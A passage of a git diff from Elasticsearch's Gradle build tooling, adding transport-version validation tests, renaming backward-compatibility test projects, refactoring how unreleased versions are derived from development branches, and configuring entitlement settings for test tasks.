"hyphen-tv", "period.tv"] + } + + def "definitions contain at least one id"() { + given: + referableAndReferencedTransportVersion("empty", "") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/empty.csv] does not contain any ids") + } + + def "definitions have ids in descending order"() { + given: + referableAndReferencedTransportVersion("out_of_order", "8100000,8200000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/out_of_order.csv] does not have ordered ids") + } + + def "definition ids are unique"() { + given: + referableAndReferencedTransportVersion("duplicate", "8123000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] contains id 8123000 already defined in " + + "[myserver/src/main/resources/transport/definitions/referable/duplicate.csv]") + } + + def "definitions have bwc ids with non-zero patch part"() { + given: + referableAndReferencedTransportVersion("patched", "8200000,8100000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/patched.csv] contains bwc id [8100000] with a patch part of 0") + } + + def "definitions have primary ids which cannot change"() { + given: + referableTransportVersion("existing_92", "8500000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] has modified primary id from 8123000 to 8500000") + } + + def "cannot change committed ids to a branch"() { + given: + referableTransportVersion("existing_92", "8123000,8012002") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] modifies existing patch id from 8012001 to 8012002") + } + + def "upper bounds files must reference defined name"() { + given: + transportVersionUpperBound("9.2", "dne", "8123000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.2.csv] contains transport version name [dne] which is not defined") + } + + def "upper bound files id must exist in definition"() { + given: + transportVersionUpperBound("9.2", "existing_92", "8124000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.2.csv] has id 8124000 which is not in definition " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv]") + } + + def "upper bound files have latest id within base"() { + given: + transportVersionUpperBound("9.0", "seemingly_latest", "8110001") + referableAndReferencedTransportVersion("original", "8110000") + referableAndReferencedTransportVersion("seemingly_latest", "8111000,8110001") + referableAndReferencedTransportVersion("actual_latest", "8112000,8110002") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.0.csv] has id 8110001 from [seemingly_latest] with base 8110000 " + + "but another id 8110002 from [actual_latest] is later for that base") + } + + def "upper bound files cannot change base id"() { + given: + referableAndReferencedTransportVersion("original", "8013000") + referableAndReferencedTransportVersion("patch", "8015000,8013001") + transportVersionUpperBound("9.1", "patch", "8013001") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version upper bound file " + + "[myserver/src/main/resources/transport/upper_bounds/9.1.csv] modifies base id from 8012000 to 8013000") + } + + def "ids must be dense"() { + given: + referableAndReferencedTransportVersion("original", "8013000") + referableAndReferencedTransportVersion("patch1", "8015000,8013002") + transportVersionUpperBound("9.0", "patch1", "8013002") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version base id 8013000 is missing patch ids between 8013000 and 8013002") + } + + def "primary id must not be patch version"() { + given: + referableAndReferencedTransportVersion("patch", "8015001") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/patch.csv] has patch version 8015001 as primary id") + } + + def "unreferable directory is optional"() { + given: + file("myserver/src/main/resources/transport/unreferable/initial_9_0_0.csv").delete() + file("myserver/src/main/resources/transport/unreferable").deleteDir() + when: + def result = gradleRunner(":myserver:validateTransportVersionResources").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + } + + def "upper bound can refer to an unreferable definition"() { + given: + unreferableTransportVersion("initial_10.0.0", "10000000") + transportVersionUpperBound("10.0", "initial_10.0.0", "10000000") + when: + def result = gradleRunner(":myserver:validateTransportVersionResources").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + } + + def "referable and unreferable definitions cannot have the same name"() { + given: + unreferableTransportVersion("existing_92", "10000000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/existing_92.csv] " + + "has same name as unreferable definition " + + "[myserver/src/main/resources/transport/definitions/unreferable/existing_92.csv]") + } + + def "unreferable definitions can have primary ids that are patches"() { + given: + unreferableTransportVersion("initial_7.0.1", "7000001") + when: + def result = gradleRunner(":myserver:validateTransportVersionResources").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + } + + def "highest id in an referable definition should exist in an upper bounds file"() { + given: + referableAndReferencedTransportVersion("some_tv", "10000000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/some_tv.csv] " + + "has the highest transport version id [10000000] but is not present in any upper bounds files") + } + + def "highest id in an unreferable definition should exist in an upper bounds file"() { + given: + unreferableTransportVersion("initial_10.0.0", "10000000") + when: + def result = validateResourcesFails() + then: + // TODO: this should be _unreferable_ in the error message, but will require some rework + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/initial_10.0.0.csv] " + + "has the highest transport version id [10000000] but is not present in any upper bounds files") + } +} diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major1/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major1/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix2/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major2/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/bugfix2/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major2/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/maintenance/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major3/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/maintenance/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major3/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major4/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/major4/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor1/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor1/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/staged/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor2/build.gradle similarity index 100% rename from build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/staged/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor2/build.gradle diff --git a/distribution/bwc/bugfix/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor3/build.gradle similarity index 100% rename from distribution/bwc/bugfix/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor3/build.gradle diff --git a/distribution/bwc/bugfix2/build.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor4/build.gradle similarity index 100% rename from distribution/bwc/bugfix2/build.gradle rename to build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/distribution/bwc/minor4/build.gradle diff --git a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle index a07060c3be18f..00691191e0fd5 100644 --- a/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle +++ b/build-tools-internal/src/integTest/resources/org/elasticsearch/gradle/internal/fake_git/remote/settings.gradle @@ -9,14 +9,14 @@ rootProject.name = "root" -include ":distribution:bwc:bugfix" -include ":distribution:bwc:bugfix2" -include ":distribution:bwc:bugfix3" -include ":distribution:bwc:minor" -include ":distribution:bwc:major" -include ":distribution:bwc:staged" -include ":distribution:bwc:staged2" -include ":distribution:bwc:maintenance" +include ":distribution:bwc:major1" +include ":distribution:bwc:major2" +include ":distribution:bwc:major3" +include ":distribution:bwc:major4" +include ":distribution:bwc:minor1" +include ":distribution:bwc:minor2" +include ":distribution:bwc:minor3" +include ":distribution:bwc:minor4" include ":distribution:archives:darwin-tar" include ":distribution:archives:oss-darwin-tar" include ":distribution:archives:darwin-aarch64-tar" diff --git a/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle b/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle index 14e2323b4d14d..7c77fb8cad38f 100644 --- a/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle +++ b/build-tools-internal/src/main/groovy/elasticsearch.fips.gradle @@ -23,11 +23,11 @@ if (buildParams.inFipsJvm) { File fipsSecurity = new File(fipsResourcesDir, javaSecurityFilename) File fipsPolicy = new File(fipsResourcesDir, 'fips_java.policy') File fipsTrustStore = new File(fipsResourcesDir, 'cacerts.bcfks') - def bcFips = dependencies.create('org.bouncycastle:bc-fips:1.0.2.5') + def bcFips = dependencies.create('org.bouncycastle:bc-fips:1.0.2.6') def bcTlsFips = dependencies.create('org.bouncycastle:bctls-fips:1.0.19') def manualDebug = false; //change this to manually debug bouncy castle in an IDE if(manualDebug) { - bcFips = dependencies.create('org.bouncycastle:bc-fips-debug:1.0.2.5') + bcFips = dependencies.create('org.bouncycastle:bc-fips-debug:1.0.2.6') bcTlsFips = dependencies.create('org.bouncycastle:bctls-fips:1.0.19'){ exclude group: 'org.bouncycastle', module: 'bc-fips' // to avoid jar hell } diff --git a/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle b/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle index 51301b405e514..2257ae2d03da9 100644 --- a/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle +++ b/build-tools-internal/src/main/groovy/elasticsearch.fwc-test.gradle @@ -7,19 +7,23 @@ * License v3.0 only", or the "Server Side Public License, v 1". */ -import org.elasticsearch.gradle.VersionProperties +import org.elasticsearch.gradle.Version import org.elasticsearch.gradle.testclusters.StandaloneRestIntegTestTask -def fwcVersions = buildParams.bwcVersions.released.findAll { it.major == VersionProperties.elasticsearchVersion.major && it.minor == VersionProperties.elasticsearchVersion.minor } -def previousMinorSnapshot = buildParams.bwcVersions.unreleased.find { it.major == VersionProperties.elasticsearchVersion.major && it.minor == VersionProperties.elasticsearchVersion.minor - 1 } - -fwcVersions.each { fwcVersion -> - tasks.register("v${fwcVersion}#fwcTest", StandaloneRestIntegTestTask) { - usesBwcDistribution(previousMinorSnapshot) - usesBwcDistribution(fwcVersion) - systemProperty("tests.old_cluster_version", previousMinorSnapshot) - systemProperty("tests.new_cluster_version", fwcVersion) - nonInputProperties.systemProperty 'tests.fwc', 'true' +Version elasticsearchVersion = Version.fromString(versions.get("elasticsearch")) +def fwcVersions = buildParams.bwcVersions.released.findAll { it.major == elasticsearchVersion.major && it.minor == elasticsearchVersion.minor } +def targetMajor = elasticsearchVersion.minor > 0 ? elasticsearchVersion.major : elasticsearchVersion.major - 1 +def targetMinor = elasticsearchVersion.minor > 0 ? elasticsearchVersion.minor - 1 : buildParams.bwcVersions.unreleased.findAll { it.major == targetMajor }*.minor.max() +def previousMinorSnapshot = buildParams.bwcVersions.unreleased.find { it.major == targetMajor && it.minor == targetMinor } +if (previousMinorSnapshot != null) { + fwcVersions.each { fwcVersion -> + tasks.register("v${fwcVersion}#fwcTest", StandaloneRestIntegTestTask) { + usesBwcDistribution(previousMinorSnapshot) + usesBwcDistribution(fwcVersion) + systemProperty("tests.old_cluster_version", previousMinorSnapshot) + systemProperty("tests.new_cluster_version", fwcVersion) + nonInputProperties.systemProperty 'tests.fwc', 'true' + } } } diff --git a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy index 01a3bdaee2337..df4fa43aad3e7 100644 --- a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy +++ b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/AntTask.groovy @@ -9,18 +9,18 @@ package org.elasticsearch.gradle.internal +import groovy.ant.AntBuilder + import org.apache.tools.ant.BuildListener import org.apache.tools.ant.BuildLogger import org.apache.tools.ant.DefaultLogger import org.apache.tools.ant.Project import org.gradle.api.DefaultTask -import org.gradle.api.GradleException import org.gradle.api.file.FileSystemOperations -import org.gradle.api.tasks.Input import org.gradle.api.tasks.TaskAction -import javax.inject.Inject import java.nio.charset.Charset +import javax.inject.Inject /** * A task which will run ant commands. @@ -83,7 +83,8 @@ public abstract class AntTask extends DefaultTask { return new DefaultLogger( errorPrintStream: stream, outputPrintStream: stream, - messageOutputLevel: outputLevel) + messageOutputLevel: outputLevel + ) } /** diff --git a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy index 88a68f1194858..c09c372800af8 100644 --- a/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy +++ b/build-tools-internal/src/main/groovy/org/elasticsearch/gradle/internal/test/AntFixture.groovy @@ -9,6 +9,8 @@ package org.elasticsearch.gradle.internal.test +import groovy.ant.AntBuilder + import org.elasticsearch.gradle.OS import org.elasticsearch.gradle.internal.AntFixtureStop diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java index b6f4c99e3d0e6..bcdd2431d1f01 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BaseInternalPluginBuildPlugin.java @@ -15,6 +15,7 @@ import org.elasticsearch.gradle.internal.info.BuildParameterExtension; import org.elasticsearch.gradle.internal.precommit.JarHellPrecommitPlugin; import org.elasticsearch.gradle.internal.test.ClusterFeaturesMetadataPlugin; +import org.elasticsearch.gradle.internal.transport.TransportVersionReferencesPlugin; import org.elasticsearch.gradle.plugin.PluginBuildPlugin; import org.elasticsearch.gradle.plugin.PluginPropertiesExtension; import org.elasticsearch.gradle.util.GradleUtils; @@ -36,6 +37,7 @@ public void apply(Project project) { project.getPluginManager().apply(JarHellPrecommitPlugin.class); project.getPluginManager().apply(ElasticsearchJavaPlugin.class); project.getPluginManager().apply(ClusterFeaturesMetadataPlugin.class); + project.getPluginManager().apply(TransportVersionReferencesPlugin.class); boolean isCi = project.getRootProject().getExtensions().getByType(BuildParameterExtension.class).getCi(); // Clear default dependencies added by public PluginBuildPlugin as we add our // own project dependencies for internal builds diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java index 15d13e567ca4b..fc43cf6f7f0f7 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/BwcVersions.java @@ -9,7 +9,7 @@ package org.elasticsearch.gradle.internal; import org.elasticsearch.gradle.Version; -import org.elasticsearch.gradle.VersionProperties; +import org.elasticsearch.gradle.internal.info.DevelopmentBranch; import java.io.Serializable; import java.util.ArrayList; @@ -24,8 +24,7 @@ import java.util.function.BiConsumer; import java.util.function.Consumer; import java.util.function.Predicate; -import java.util.regex.Matcher; -import java.util.regex.Pattern; +import java.util.stream.Collectors; import static java.util.Collections.reverseOrder; import static java.util.Collections.unmodifiableList; @@ -65,20 +64,13 @@ public class BwcVersions implements Serializable { - private static final Pattern LINE_PATTERN = Pattern.compile( - "\\W+public static final Version V_(\\d+)_(\\d+)_(\\d+)(_alpha\\d+|_beta\\d+|_rc\\d+)?.*\\);" - ); private static final String GLIBC_VERSION_ENV_VAR = "GLIBC_VERSION"; private final Version currentVersion; private final transient List versions; private final Map unreleased; - public BwcVersions(List versionLines, List developmentBranches) { - this(versionLines, Version.fromString(VersionProperties.getElasticsearch()), developmentBranches); - } - - public BwcVersions(Version currentVersionProperty, List allVersions, List developmentBranches) { + public BwcVersions(Version currentVersionProperty, List allVersions, List developmentBranches) { if (allVersions.isEmpty()) { throw new IllegalArgumentException("Could not parse any versions"); } @@ -90,20 +82,6 @@ public BwcVersions(Version currentVersionProperty, List allVersions, Li this.unreleased = computeUnreleased(developmentBranches); } - // Visible for testing - BwcVersions(List versionLines, Version currentVersionProperty, List developmentBranches) { - this(currentVersionProperty, parseVersionLines(versionLines), developmentBranches); - } - - private static List parseVersionLines(List versionLines) { - return versionLines.stream() - .map(LINE_PATTERN::matcher) - .filter(Matcher::matches) - .map(match -> new Version(Integer.parseInt(match.group(1)), Integer.parseInt(match.group(2)), Integer.parseInt(match.group(3)))) - .sorted() - .toList(); - } - private void assertCurrentVersionMatchesParsed(Version currentVersionProperty) { if (currentVersionProperty.equals(currentVersion) == false) { throw new IllegalStateException( @@ -127,81 +105,46 @@ public void forPreviousUnreleased(Consumer consumer) { getUnreleased().stream().filter(version -> version.equals(currentVersion) == false).map(unreleased::get).forEach(consumer); } - private String getBranchFor(Version version, List developmentBranches) { - // If the current version matches a specific feature freeze branch, use that - if (developmentBranches.contains(version.getMajor() + "." + version.getMinor())) { - return version.getMajor() + "." + version.getMinor(); - } else if (developmentBranches.contains(version.getMajor() + ".x")) { // Otherwise if an n.x branch exists and we are that major - return version.getMajor() + ".x"; - } else { // otherwise we're the main branch - return "main"; - } - } - - private Map computeUnreleased(List developmentBranches) { + private Map computeUnreleased(List developmentBranches) { Map result = new TreeMap<>(); + Map> bwcBranches = developmentBranches.stream() + .filter(developmentBranch -> developmentBranch.version().before(currentVersion)) + .sorted(reverseOrder(comparing(DevelopmentBranch::version))) + .collect(Collectors.groupingBy(branch -> { + if (branch.version().getMajor() == currentVersion.getMajor()) { + return "minor"; + } else if (branch.version().getMajor() == currentVersion.getMajor() - 1) { + return "major"; + } + return "older"; + })); + + developmentBranches.stream() + .filter(branch -> branch.version().equals(currentVersion)) + .findFirst() + .ifPresent( + developmentBranch -> result.put( + currentVersion, + new UnreleasedVersionInfo(currentVersion, developmentBranch.name(), ":distribution") + ) + ); - // The current version is always in development - String currentBranch = getBranchFor(currentVersion, developmentBranches); - result.put(currentVersion, new UnreleasedVersionInfo(currentVersion, currentBranch, ":distribution")); - - // Check for an n.x branch as well - if (currentBranch.equals("main") && developmentBranches.stream().anyMatch(s -> s.endsWith(".x"))) { - // This should correspond to the latest new minor - Version version = versions.stream() - .sorted(Comparator.reverseOrder()) - .filter(v -> v.getMajor() == (currentVersion.getMajor() - 1) && v.getRevision() == 0) - .findFirst() - .orElseThrow(() -> new IllegalStateException("Unable to determine development version for branch")); - String branch = getBranchFor(version, developmentBranches); - assert branch.equals(currentVersion.getMajor() - 1 + ".x") : "Expected branch does not match development branch"; - - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:minor")); + List previousMinorBranches = bwcBranches.getOrDefault("minor", Collections.emptyList()); + for (int i = 0; i < previousMinorBranches.size(); i++) { + DevelopmentBranch previousMinorBranch = previousMinorBranches.get(i); + result.put( + previousMinorBranch.version(), + new UnreleasedVersionInfo(previousMinorBranch.version(), previousMinorBranch.name(), ":distribution:bwc:minor" + (i + 1)) + ); } - // Now handle all the feature freeze branches - List featureFreezeBranches = developmentBranches.stream() - .filter(b -> Pattern.matches("[0-9]+\\.[0-9]+", b)) - .sorted(reverseOrder(comparing(s -> Version.fromString(s, Version.Mode.RELAXED)))) - .toList(); - - int bugfixCount = 0; - boolean existingStaged = false; - for (int i = 0; i < featureFreezeBranches.size(); i++) { - String branch = featureFreezeBranches.get(i); - Version version = versions.stream() - .sorted(Comparator.reverseOrder()) - .filter(v -> v.toString().startsWith(branch)) - .findFirst() - .orElse(null); - - // If we don't know about this version we can ignore it - if (version == null) { - continue; - } - - // If this is the current version we can ignore as we've already handled it - if (version.equals(currentVersion)) { - continue; - } - - // We only maintain compatibility back one major so ignore anything older - if (currentVersion.getMajor() - version.getMajor() > 1) { - continue; - } - - // This is the maintenance version - if (i == featureFreezeBranches.size() - 1) { - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:maintenance")); - } else if (version.getRevision() == 0) { // This is the next staged minor - String project = existingStaged ? "staged2" : "staged"; - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:" + project)); - existingStaged = true; - } else { // This is a bugfix - bugfixCount++; - String project = "bugfix" + (bugfixCount > 1 ? bugfixCount : ""); - result.put(version, new UnreleasedVersionInfo(version, branch, ":distribution:bwc:" + project)); - } + List previousMajorBranches = bwcBranches.getOrDefault("major", Collections.emptyList()); + for (int i = 0; i < previousMajorBranches.size(); i++) { + DevelopmentBranch previousMajorBranch = previousMajorBranches.get(i); + result.put( + previousMajorBranch.version(), + new UnreleasedVersionInfo(previousMajorBranch.version(), previousMajorBranch.name(), ":distribution:bwc:major" + (i + 1)) + ); } return Collections.unmodifiableMap(result); @@ -211,19 +154,6 @@ public List getUnreleased() { return unreleased.keySet().stream().sorted().toList(); } - private void addUnreleased(Set unreleased, Version current, int index) { - if (current.getRevision() == 0) { - // If the current version is a new minor, the next version is also unreleased - Version next = versions.get(versions.size() - (index + 2)); - unreleased.add(next); - - // Keep looking through versions until we find the end of unreleased versions - addUnreleased(unreleased, next, index + 1); - } else { - unreleased.add(current); - } - } - public void compareToAuthoritative(List authoritativeReleasedVersions) { Set notReallyReleased = new HashSet<>(getReleased()); notReallyReleased.removeAll(authoritativeReleasedVersions); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java index 9fbba42d09ad3..387ef5523b23b 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ElasticsearchTestBasePlugin.java @@ -34,9 +34,12 @@ import java.io.File; import java.util.List; import java.util.Map; +import java.util.Set; +import java.util.stream.Stream; import javax.inject.Inject; +import static java.util.stream.Collectors.joining; import static org.elasticsearch.gradle.internal.util.ParamsUtils.loadBuildParams; import static org.elasticsearch.gradle.util.FileUtils.mkdirs; import static org.elasticsearch.gradle.util.GradleUtils.maybeConfigure; @@ -48,6 +51,8 @@ public abstract class ElasticsearchTestBasePlugin implements Plugin { public static final String DUMP_OUTPUT_ON_FAILURE_PROP_NAME = "dumpOutputOnFailure"; + public static final Set TEST_TASKS_WITH_ENTITLEMENTS = Set.of("test", "internalClusterTest"); + @Inject protected abstract ProviderFactory getProviderFactory(); @@ -172,6 +177,25 @@ public void execute(Task t) { nonInputProperties.systemProperty("workspace.dir", Util.locateElasticsearchWorkspace(project.getGradle())); // we use 'temp' relative to CWD since this is per JVM and tests are forbidden from writing to CWD nonInputProperties.systemProperty("java.io.tmpdir", test.getWorkingDir().toPath().resolve("temp")); + if (test.getName().equals("internalClusterTest")) { + // configure a node home directory independent of the Java temp dir so that entitlements can be properly enforced + nonInputProperties.systemProperty("tempDir", test.getWorkingDir().toPath().resolve("nodesTemp")); + } + + SourceSetContainer sourceSets = project.getExtensions().getByType(SourceSetContainer.class); + SourceSet mainSourceSet = sourceSets.findByName(SourceSet.MAIN_SOURCE_SET_NAME); + SourceSet testSourceSet = sourceSets.findByName(SourceSet.TEST_SOURCE_SET_NAME); + SourceSet internalClusterTestSourceSet = sourceSets.findByName("internalClusterTest"); + + if (TEST_TASKS_WITH_ENTITLEMENTS.contains(test.getName()) && mainSourceSet != null && testSourceSet != null) { + FileCollection mainRuntime = mainSourceSet.getRuntimeClasspath(); + FileCollection testRuntime = testSourceSet.getRuntimeClasspath(); + FileCollection internalClusterTestRuntime = ("internalClusterTest".equals(test.getName()) + && internalClusterTestSourceSet != null) ? internalClusterTestSourceSet.getRuntimeClasspath() : project.files(); + FileCollection testOnlyFiles = testRuntime.plus(internalClusterTestRuntime).minus(mainRuntime); + + test.doFirst(task -> test.environment("es.entitlement.testOnlyPath", testOnlyFiles.getAsPath())); + } test.systemProperties(getProviderFactory().systemPropertiesPrefixedBy("tests.").get()); test.systemProperties(getProviderFactory().systemPropertiesPrefixedBy("es.").get()); @@ -205,46 +229,124 @@ public void execute(Task t) { } /* - * If this project builds a shadow JAR than any unit tests should test against that artifact instead of + * If this project builds a shadow JAR then any unit tests should test against that artifact instead of * compiled class output and dependency jars. This better emulates the runtime environment of consumers. */ project.getPluginManager().withPlugin("com.gradleup.shadow", p -> { if (test.getName().equals(JavaPlugin.TEST_TASK_NAME)) { // Remove output class files and any other dependencies from the test classpath, since the shadow JAR includes these - SourceSetContainer sourceSets = project.getExtensions().getByType(SourceSetContainer.class); - FileCollection mainRuntime = sourceSets.getByName(SourceSet.MAIN_SOURCE_SET_NAME).getRuntimeClasspath(); // Add any "shadow" dependencies. These are dependencies that are *not* bundled into the shadow JAR Configuration shadowConfig = project.getConfigurations().getByName(ShadowBasePlugin.CONFIGURATION_NAME); // Add the shadow JAR artifact itself FileCollection shadowJar = project.files(project.getTasks().named("shadowJar")); - FileCollection testRuntime = sourceSets.getByName(SourceSet.TEST_SOURCE_SET_NAME).getRuntimeClasspath(); + FileCollection mainRuntime = mainSourceSet.getRuntimeClasspath(); + FileCollection testRuntime = testSourceSet.getRuntimeClasspath(); test.setClasspath(testRuntime.minus(mainRuntime).plus(shadowConfig).plus(shadowJar)); } }); }); - configureImmutableCollectionsPatch(project); + configureJavaBaseModuleOptions(project); + configureEntitlements(project); + } + + /** + * Computes and sets the {@code --patch-module=java.base} and {@code --add-opens=java.base} JVM command line options. + */ + private void configureJavaBaseModuleOptions(Project project) { + project.getTasks().withType(Test.class).configureEach(test -> { + // patch immutable collections only for "test" task + FileCollection patchedImmutableCollections = test.getName().equals("test") ? patchedImmutableCollections(project) : null; + if (patchedImmutableCollections != null) { + test.getInputs().files(patchedImmutableCollections); + test.systemProperty("tests.hackImmutableCollections", "true"); + } + + FileCollection entitlementBridge = TEST_TASKS_WITH_ENTITLEMENTS.contains(test.getName()) ? entitlementBridge(project) : null; + if (entitlementBridge != null) { + test.getInputs().files(entitlementBridge); + } + + test.getJvmArgumentProviders().add(() -> { + String javaBasePatch = Stream.concat( + singleFilePath(patchedImmutableCollections).map(str -> str + "/java.base"), + singleFilePath(entitlementBridge) + ).collect(joining(File.pathSeparator)); + + return javaBasePatch.isEmpty() + ? List.of() + : List.of("--patch-module=java.base=" + javaBasePatch, "--add-opens=java.base/java.util=ALL-UNNAMED"); + }); + }); + } + + private Stream singleFilePath(FileCollection collection) { + return Stream.ofNullable(collection).filter(fc -> fc.isEmpty() == false).map(FileCollection::getSingleFile).map(File::toString); } - private void configureImmutableCollectionsPatch(Project project) { + private static FileCollection patchedImmutableCollections(Project project) { String patchProject = ":test:immutable-collections-patch"; if (project.findProject(patchProject) == null) { - return; // build tests may not have this project, just skip + return null; // build tests may not have this project, just skip } String configurationName = "immutableCollectionsPatch"; FileCollection patchedFileCollection = project.getConfigurations() .create(configurationName, config -> config.setCanBeConsumed(false)); var deps = project.getDependencies(); deps.add(configurationName, deps.project(Map.of("path", patchProject, "configuration", "patch"))); - project.getTasks().withType(Test.class).matching(task -> 